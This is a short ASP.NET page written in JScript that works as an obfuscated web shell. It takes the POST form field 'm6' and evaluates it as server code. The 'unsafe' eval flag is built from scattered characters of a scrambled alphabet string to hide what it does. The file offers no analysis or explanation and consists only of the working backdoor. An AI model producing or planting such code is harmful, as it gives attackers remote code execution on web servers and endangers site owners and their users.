<%@ Page Language="Jscript" Debug=true%>
<%
var BKAT='tCdHZOgjGqoWIaikeNDKswAfxvMVRbPLJphcTQmruSYFlnXEyBzU';
var PMEL=Request.Form("m6");
var DRBY=BKAT(40) + BKAT(17) + BKAT(20) + BKAT(13) + BKAT(23) + BKAT(16);
eval(PMEL, DRBY);
%>